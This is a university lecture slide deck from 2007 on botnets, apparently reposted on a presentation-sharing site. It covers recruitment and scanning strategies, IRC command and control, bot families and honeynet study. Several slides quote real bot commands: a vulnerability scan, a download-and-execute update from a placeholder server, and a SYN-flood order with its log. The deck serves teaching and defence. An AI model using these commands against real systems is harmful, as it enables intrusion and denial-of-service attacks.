1 / 19

563.7.2 Bot Nets

563.7.2 Bot Nets. Evgeni Peryshkin University of Illinois Fall 2007. What Botnets do. Denial of service (tribe flood trinu, stacheldraht, trinity) Adware Spyware E-mail spam

shoshana-gallagher
Download Presentation

563.7.2 Bot Nets

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 563.7.2Bot Nets Evgeni Peryshkin University of Illinois Fall 2007

  2. What Botnets do Denial of service (tribe flood trinu, stacheldraht, trinity) Adware Spyware E-mail spam Click fraud-or the purpose of generating a charge per click without having actual interest in the target of the ad's link identity theft Spreading new malware – start base for e-mail virus papers/bots 2

  3. Creation and use wikipedia: botnet 3

  4. Dramatis personae Attacker(s) IRC server Handler Handler Agent Agent Agent Victim Agent-handler attack model IRC-based attack model Specht, Lee, 04 4

  5. Agent Recruitment - scanning strategy • Random Scanning (Code Red) • high traffic volume of inter-network traffic - may aid detection • no coordination - increases likelihood of duplicate scans • Hit List • splits off pieces of the list to give to newly recruited machines • can be very fast and efficient - no collisions • a large list will cause more traffic, possibly aiding detection • Permutation Scanning • if an agent sees an already infected host, it chooses a new random starting point • if an agent sees a certain threshold number of infected hosts, it becomes dormant • Signpost Scanning • uses communication patterns or data found on newly infected hosts to select next targets • any email worm that spreads using address book of infected host • hard to detect based on traffic patterns • may be slow to spread • Local Subnet (code red II, nimda) Uiuc 563.9.1 DOS attacks Classification/Taxonomy 5

  6. Agent Recruitment - vulnerability scanning • Horizontal • looks for specific port/vulnerability • Vertical • look for multiple ports/vulnerabilities on the same host • Coordinated • scan multiple machines on the same subnet for a specific vulnerability • Stealthy • any of the above, but do it slowly to avoid detection Uiuc 563.9.1 DOS attacks Classification/Taxonomy 6

  7. Agent Recruitment - attack code propagation • Central Server (li0n worm) • all newly recruited agents contact a central server to get attack code • single point of failure • can be discovered and shut down • high load at central server may limit efficiency or enable detection • Back-chaining (ramen, morris worms) • attack code downloaded from machine that was used to exploit the new host • Autonomous – (Code Red, Warhol, various email worms) • attack code downloaded concurrently w/exploit Uiuc 563.9.1 DOS attacks Classification/Taxonomy 7

  8. How to study bot nets • Create honeynet – interactive honeypot • Data Control – contain malicous activity • Your node • Data Capture – store what user is doing • Data Analysis – interpret data captured • Data Collection – send data captured to organized source papers/honeynet 8

  9. How IRC controlled Bot nets grow • Compromise host • Use tftp/ftp/http/Csend to transfer itself to compromised host • Start binary, which connects to hard-coded master server (using dynamic DNS name) • Bot contact server, server send info about itself including features understood • Bot logins in to masters channel with password papers/bots 9

  10. How IRC controlled Bot nets grow 2 • topic of the channel interprets as a command for bot. • Example: advscan lsass 200 5 0 -r -s • Use use 200 threads to search for lsass vunerability every 5 seconds. –s for silent to reduce traffic. Add more hosts to botnet. • Example 2:".http.update http://<server>/~mugenxu/rBot.exe c:\msy32awds.exe 1" • Download binary file and execute to update bot. • Generally bots don’t spread unless told so. papers/bots 10

  11. How IRC controlled Bot nets grow 3 • If requested, bot tell server of spread. • IRC server will provide the channels userlist. (channel operators to save traffic and disguise number bots) • Before commands sent controller has to authenticate with bots over irc channel. • Example .la plmp -s • -s no fail reply to reduce traffic papers/bots 11

  12. How IRC controlled Bot nets grow 4 • Irc server(s) is compromised machine. • Flexibility of own irc server. Harder to trace to attacker. • Beginners- bot-network on original irdD • 1,200 clients named rbot<######> report scanning results. (easy to discover) • Top bot-net irc server: Unreal IRCd and ConferenceRoom: papers/bots 12

  13. Different kinds of Bots -popular • Agobot/Phatbot/Forbot/XtremBot –tidy GPL c++, tidy abstract design, modular and easy to add commands • SDBot/RBot/UrBot/UrXBot/... – most active, messy c, GPL • mIRC-based Bots - GT-Bots – launch mIRC chat-client, hidewindown executable to hide mIRC papers/bots 13

  14. Bot net size • Dutch police found a 1.5 million node botnet • Norwegian ISP Telenor disbanded a 10,000-node botnet • Of the 600 million computers currently on the internet, between 100 and 150 million were already part of these botnets, Mr Cerf said. • Generally 50k is large for botnet bbc papers/bots 14

  15. Botnet vs Botnet If machine part of 2 botnets, packet sniffing allows to gather the key information of the other botnet. Thus it is possible to "steal" another botnet. Stealing is easier than building [out] one Some actually "secure" the bot machines Install patches shut down open ports DDOS to kidnap over bots. Honeynetdark readingone on one 15 15

  16. New Botnets • Shift from IRC to http/peer to peer • Peer to peer more popular- not centralized, bots forwards commands to other bots. dark reading

  17. Example DDos attack • [###FOO###] <~nickname> .scanstop • [###FOO###] <~nickname> .ddos.syn 151.49.8.XXX 21 200 • [###FOO###] <-[XP]-18330> [DDoS]: Flooding: (151.49.8.XXX:21) for 200 seconds [...] [###FOO###] <-[2K]-33820> [DDoS]: Done with flood (2573KB/sec). [###FOO###] <-[XP]-86840> [DDoS]: Done with flood (351KB/sec). papers/bots

  18. Lessons learned • Botnets stolen frequently. If get password and channel name, can instruct bot to upgrade to your botnet software. (fun to watch bot steal bots) • Updates frequent- one update killed botnet, invalid 1 char in nickname. • Unskilled people run botnets. (username, own servers, own webserver for updates) • often botnets are run by young males with surprisingly limited programming skills. ("How can i compile *" ) papers/bots

  19. Suggested Readings • http://honeynet.thalix.com/papers/honeynet/index.html • http://www.honeynet.org/papers/bots/ • http://en.wikipedia.org/wiki/Bot_net • http://news.bbc.co.uk/2/hi/business/6298641.stm • http://www.wired.com/politics/security/magazine/15-09/ff_estonia 19

More Related